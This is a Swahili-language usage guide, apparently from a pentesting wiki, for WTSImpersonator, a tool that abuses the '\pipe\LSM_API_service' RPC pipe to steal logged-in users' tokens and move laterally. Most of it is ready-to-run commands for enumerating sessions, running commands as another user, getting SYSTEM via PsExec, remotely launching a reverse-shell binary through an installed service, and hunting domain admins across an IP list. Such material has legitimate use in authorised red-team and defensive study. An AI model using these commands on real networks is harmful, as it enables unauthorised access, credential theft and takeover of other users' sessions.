Zana ya WTS Impersonator inatumia bomba la jina la RPC la "\pipe\LSM_API_service" kwa siri kuchunguza watumiaji walioingia na kuiba vitambulisho vyao, kukiuka mbinu za kawaida za Udanganyifu wa Vitambulisho. Mbinu hii inarahisisha harakati za pembeni ndani ya mitandao. Ubunifu nyuma ya mbinu hii unatolewa kwa Omri Baso, ambaye kazi yake inapatikana kwenye GitHub.

Kazi Kuu

Zana hufanya kazi kupitia mfululizo wa wito wa API:

WTSEnumerateSessionsA → WTSQuerySessionInformationA → WTSQueryUserToken → CreateProcessAsUserW

Moduli muhimu na Matumizi

• Kutambua Watumiaji: Uchambuzi wa watumiaji wa ndani na wa mbali unawezekana kwa kutumia zana, kwa kutumia amri kwa hali yoyote:

• Kwa ndani:

.\WTSImpersonator.exe -m enum

• Kijijini, kwa kufafanua anwani ya IP au jina la mwenyeji:

.\WTSImpersonator.exe -m enum -s 192.168.40.131

• Kutekeleza Amri: Moduli za exec na exec-remote zinahitaji Muktadha wa Huduma ili kufanya kazi. Utekelezaji wa ndani unahitaji tu faili ya WTSImpersonator na amri:

• Mfano wa utekelezaji wa amri ya ndani:

.\WTSImpersonator.exe -m exec -s 3 -c C:\Windows\System32\cmd.exe

• PsExec64.exe inaweza kutumika kupata muktadha wa huduma:

.\PsExec64.exe -accepteula -s cmd.exe

• Utekelezaji wa Amri Kijijini: Unahusisha kuunda na kusakinisha huduma kijijini sawa na PsExec.exe, kuruhusu utekelezaji na ruhusa sahihi.

• Mfano wa utekelezaji wa kijijini:

.\WTSImpersonator.exe -m exec-remote -s 192.168.40.129 -c .\SimpleReverseShellExample.exe -sp .\WTSService.exe -id 2

• Moduli ya Kutafuta Mtumiaji: Inalenga watumiaji maalum kwenye mashine kadhaa, kutekeleza nambari chini ya sifa zao. Hii ni muhimu hasa kwa kulenga Waadmin wa Kikoa wenye haki za msimamizi wa ndani kwenye mifumo kadhaa.

• Mfano wa matumizi:

.\WTSImpersonator.exe -m user-hunter -uh DOMAIN/USER -ipl .\IPsList.txt -c .\ExeToExecute.exe -sp .\WTServiceBinary.exe